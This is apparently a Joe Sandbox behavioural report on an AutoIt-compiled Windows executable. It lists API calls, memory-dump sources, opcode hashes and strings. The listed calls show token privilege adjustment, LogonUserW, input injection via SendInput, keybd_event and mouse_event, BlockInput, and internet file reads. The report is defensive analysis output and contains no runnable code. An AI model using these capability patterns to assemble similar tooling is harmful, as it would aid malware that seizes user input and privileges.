                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: c6f7b2c28df0f298505b3672dce0a95eadf832a407aaa006081aaac409a1f7b0
                                                                            • Instruction ID: c96708cc1651a03834a223a53e2791fdd30b5d4bfe913ef2a2fdef5f826001f8
                                                                            • Opcode Fuzzy Hash: c6f7b2c28df0f298505b3672dce0a95eadf832a407aaa006081aaac409a1f7b0
                                                                            • Instruction Fuzzy Hash: 7E31A2B11083419FD300EF51D895AAFBBF8BF95354F40092EF585821E1EB759949CB62
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00511ED6,00000000), ref: 00512AAD
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00511ED6,00000000), ref: 00512AE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: 9fc175cfb396073bcab8956a1620a97bfb98439cdf1b79b94f9f28c084049eab
                                                                            • Instruction ID: 74a20fa0d499436c26ffe1cbb3b7e13438e96f4498883b89c02b2dce9f87a4cc
                                                                            • Opcode Fuzzy Hash: 9fc175cfb396073bcab8956a1620a97bfb98439cdf1b79b94f9f28c084049eab
                                                                            • Instruction Fuzzy Hash: 3D41E375604209BFFB20DE55CC85EFBBBACFF40714F10441EF605A6181EAB1AEE19664
APIs
  • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
  • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
• GetLastError.KERNEL32 ref: 004F941D
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 6f37eb878add69ccafa5f8f4559e17b432c0e714b0f9e48bf419db8d89e939ba
• Instruction ID: 64c071e519866f3430eae20946fb72f5f6e745ca74f4f3877f16d2b6fb0c5dd6
• Opcode Fuzzy Hash: 6f37eb878add69ccafa5f8f4559e17b432c0e714b0f9e48bf419db8d89e939ba
• Instruction Fuzzy Hash: 1911BFB1418308AFD728DF54DC85E3BB7BCEB48310B20852EE45A83291EB74AC41CB64
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00504271
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005042B2
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005042BD
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: e4fc4c4f10a0369e5ad026f0f3bceed5de1d6f141c924dbc26bfe46a2f17d2aa
• Instruction ID: 820aed5b5c873e56b6ae88ad4f4dbe6ab4b84980890af562f566ad04e9a57f2c
• Opcode Fuzzy Hash: e4fc4c4f10a0369e5ad026f0f3bceed5de1d6f141c924dbc26bfe46a2f17d2aa
• Instruction Fuzzy Hash: D9113CB5E01228BBDB108FA5AC44BAFBFBCEB45B60F104156FD04E7290C6705A059BA1
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00504F45
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00504F5C
• FreeSid.ADVAPI32(?), ref: 00504F6C
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 7676e1677a63d3c4d6add5b25b7ea5d950f6cf8033632c83a502abfdcdb964e4
• Instruction ID: 401577ced1437656ed64a5a6a07ef2997fc91991380234f1666e45091ee0ae3e
• Opcode Fuzzy Hash: 7676e1677a63d3c4d6add5b25b7ea5d950f6cf8033632c83a502abfdcdb964e4
• Instruction Fuzzy Hash: E2F04F7591130DFFDF04DFE0DD99AAEBBBCEF08201F404469A501E2680D7345A089B50
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00501B01
• keybd_event.USER32(?,000BECBC,?,00000000,?,?,00000002,?,000BECBC,?,00008000), ref: 00501B14
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: a84e774b1e560c4ce98c0f42ea79785d4101b2a0c0026db2c5d27f75860e91af
• Instruction ID: 90d227eb540f45dea91c4369fa0188047004a2914110c2ac6b53b18622d0fdcd
• Opcode Fuzzy Hash: a84e774b1e560c4ce98c0f42ea79785d4101b2a0c0026db2c5d27f75860e91af
• Instruction Fuzzy Hash: 2BF0497190020DABDB10CFA4C805BFE7BB4FF14315F00804AF95596292D3799615DF95
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00519B52,?,0053098C,?), ref: 0050A6DA
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00519B52,?,0053098C,?), ref: 0050A6EC
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 6a24ca3dbbd3268d1842f8c1245006a8f89ef9e9bea6c96506996af4b9a9c5c3
• Instruction ID: 48da96e81b454ae29acf297b7d7e5dd735b0187608af1a481d98ef6b94379e51
• Opcode Fuzzy Hash: 6a24ca3dbbd3268d1842f8c1245006a8f89ef9e9bea6c96506996af4b9a9c5c3
• Instruction Fuzzy Hash: 11F0823550432DBBDB21AFE4CC48FEA776CBF19761F008156B90897291D6309944CBA1
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F8F27), ref: 004F8DFE
• CloseHandle.KERNEL32(?,?,004F8F27), ref: 004F8E10
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: d95e3349df06e994b56eb03568a592767853bcc8ad038ae9150595b1271c2317
• Instruction ID: 34621e0463b652c4314c8cd155439c5292666d33aa7a071cc5a7630dd9c12af9
• Opcode Fuzzy Hash: d95e3349df06e994b56eb03568a592767853bcc8ad038ae9150595b1271c2317
• Instruction Fuzzy Hash: E7E08635000600EFE7652B51EC18E7377ADEF01310710881EF496808B0CB215CD0DB14
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,004C8F87,?,?,?,00000001), ref: 004CA38A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004CA393
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 191a596c166ba1f064aa75736ef7db8a47efa88b9c6dc43a88e9725a699b5676
• Instruction ID: 6892a8d91bac0254fad532cd528909a372b9311f6aa293ed5527f2efbf051fc6
• Opcode Fuzzy Hash: 191a596c166ba1f064aa75736ef7db8a47efa88b9c6dc43a88e9725a699b5676
• Instruction Fuzzy Hash: 45B09231064308ABCE402B91EC19B883F68EB55A62F005410F60D452A0CB625454AA91
APIs
• BlockInput.USER32(00000001), ref: 005145F0
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: c299722ee05d5df0cea0950c9d0fd3bf876d66e37b8869e40e9ba2d30b8c1299
• Instruction ID: 4ff9e28d7bc5cf373440c9485ed44e26a5daf02a9152daf9a5857bb4036efa79
• Opcode Fuzzy Hash: c299722ee05d5df0cea0950c9d0fd3bf876d66e37b8869e40e9ba2d30b8c1299
• Instruction Fuzzy Hash: 55E0DF312002159FD310AF6AE800A8AFBE9AFA4760F00841AFC49DB350DAB4E8818B90
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000,00515529), ref: 00505205
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: b436a29e5e5086c1aaddf8d8f1d7550067356ca5d6554b463cd172d818ccda77
• Instruction ID: 1ea58dd5ff0fad7a5ef461e21bbfb1cd83a473ccd2cd6e3e673592ea28ddcfda
• Opcode Fuzzy Hash: b436a29e5e5086c1aaddf8d8f1d7550067356ca5d6554b463cd172d818ccda77
• Instruction Fuzzy Hash: 3DD06CB5164A0A69ED580724AA1FF7F1A08F341781F945A497182891C2B8946885EE21
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004F8FA7), ref: 004F9389
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: b44c3845017e3ce7a2eeba80f89df5ed0e1f3e44ace1ad390e6326c78fa30480
• Instruction ID: 1a464ad04a3c7e9a7e7a06bbd18cb8d2451b5af7a187f3d88824bd93f37830c2
• Instruction Fuzzy Hash: 2AD05E3226460EABEF018EA4DC05EAE3B69EB04B01F808111FE15C51A0C775D835AB60
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 004E0734
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 03fc59ef0e0d002ee5cfc7df51dfcab52b64ab689bcf197df6badb08e8c6e8ee
• Instruction ID: 8f51176a5ef7a8ebf7b7ae7fc7bfd68f5f434542bcef74c3e018ad4b775f490d
• Instruction Fuzzy Hash: F0C04CF1800109DBCB05DBA0D99CEFE77BCAB04305F500056A115F2140D7789B449A71
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 004CA35A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 3c988413c27fff6c13d85de1c9bf744adf7bd8705799b979a40ceba7e5530089
• Instruction ID: 68665bd6bd1fdcaa84face4686f7d01e72a2b07f4f80798459786d411b6d1a0b
• Instruction Fuzzy Hash: 56A0223002030CFBCF002F82FC08888BFACEB022A0B008020F80C02232CB33A820AAC0
APIs
• DeleteObject.GDI32(?), ref: 00517F45
• DeleteObject.GDI32(?), ref: 00517F57
• DestroyWindow.USER32 ref: 00517F65
• GetDesktopWindow.USER32(?), ref: 00517F7F
• GetWindowRect.USER32(00000000), ref: 00517F86
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005180C7
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005180D7
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051811F
• GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051812B
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000,?,88C00000,000000FF,000000FF,?), ref: 00518165
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518187
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051819A
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181A5
• GlobalLock.KERNEL32(00000000), ref: 005181AE
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181BD
• GlobalUnlock.KERNEL32(00000000), ref: 005181C6
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181CD
• GlobalFree.KERNEL32(00000000), ref: 005181D8
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181EA
• #418.OLEAUT32(88C00000,00000000,00000000,00533C7C,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518200
• GlobalFree.KERNEL32(00000000), ref: 00518210
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518236
• SendMessageW.USER32(?,00000172,00000000,000001F4,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518255
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518277
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518464
Strings
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$#418AdjustAllocClientCloseCopyDesktopDestroyHandleImageLockMessageReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2158968032-2373415609
• Opcode ID: 18559b461537fe711140724f33746ac9291382665fb4f424e55640bb3016fca7
• Instruction ID: 3d9d65d1c49d381dde634c1e880460b3eb775581220b83b83e0e9b908162fb5d
• Instruction Fuzzy Hash: 8402BC71900208EFDB14DFA8CC99EAE7BB9FF49314F048149F915AB2A1CB74AD45DB60
APIs
• CharUpperBuffW.USER32(?,?,00530980), ref: 00523C65
• IsWindowVisible.USER32(?), ref: 00523C89
Strings
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: 4a8776a3bc46177ad649a32c474dd935c4366c80598e6747236bed6dce1c2d86
• Instruction ID: d9775a0817f8359fd99fe984ffbe7ae01d501ceefa99ad83910caf0df3a3077b
• Instruction Fuzzy Hash: 8ED16E34204315CBCB04EF11D461E6E7FA5BF96358F10485EF9865B2E2CB29EE4ACB45
APIs
• SetTextColor.GDI32(?,00000000), ref: 0052AC55
• GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AC86
• GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AC92
• SetBkColor.GDI32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?), ref: 0052ACAC
• SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?), ref: 0052ACBB
• InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052ACE6
• GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052ACEE
• CreateSolidBrush.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052ACF5
• FrameRect.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052AD04
• DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AD0B
• InflateRect.USER32(?,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052AD56
• FillRect.USER32(?,?,?), ref: 0052AD88
• GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0052ADB3
  • Part of subcall function 0052AF18: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052AF51
  • Part of subcall function 0052AF18: SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000), ref: 0052AF55
  • Part of subcall function 0052AF18: GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF6B
  • Part of subcall function 0052AF18: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF76
  • Part of subcall function 0052AF18: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF93
  • Part of subcall function 0052AF18: CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFA1
  • Part of subcall function 0052AF18: SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFB2
  • Part of subcall function 0052AF18: SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFBB
  • Part of subcall function 0052AF18: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFC8
  • Part of subcall function 0052AF18: InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFE7
  • Part of subcall function 0052AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052AFFE
  • Part of subcall function 0052AF18: GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B013
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Opcode ID: 11397aa923bd17e747dff7dabc1dd8c7a3a92632c760c3e67265decdb354b899
• Instruction ID: 3a9d035294abc390ecfd89f6b326dd3d358b8d31e00dd88e581c36ffbd760e67
• Instruction Fuzzy Hash: 2EA1BE72008311BFD7519F64EC18E6BBBA9FF89321F101A19F962A62E0D771D848DF52
APIs
Strings
Similarity
• API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 2660009612-1645009161
• Opcode ID: 62f403c4e5570a24d7ad64a7fc9ff84cb922f5a94d9083e7ef956dfd4986e7ee
• Instruction ID: 0715ff373fbbaf1d9557dd34a875f1decff988e25f847d0721d2d5380f95a7b6
• Instruction Fuzzy Hash: EAA1B070A00209BBCB10AF22CD52FBF3B74BF45744F14412FF805AA292DBB99E15D669
APIs
• DestroyWindow.USER32(?), ref: 00517BC8
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00517C87
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00517CC5
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00517CD7
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00517D1D
• GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00517D29
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517D6D
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517D7C
• GetStockObject.GDI32(00000011,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517D8C
• SelectObject.GDI32(00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517D90
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517DA0
• GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517DA9
• DeleteDC.GDI32(00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517DB2
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00517DDE
• SendMessageW.USER32(00000030,00000000,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517DF5
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00517E30
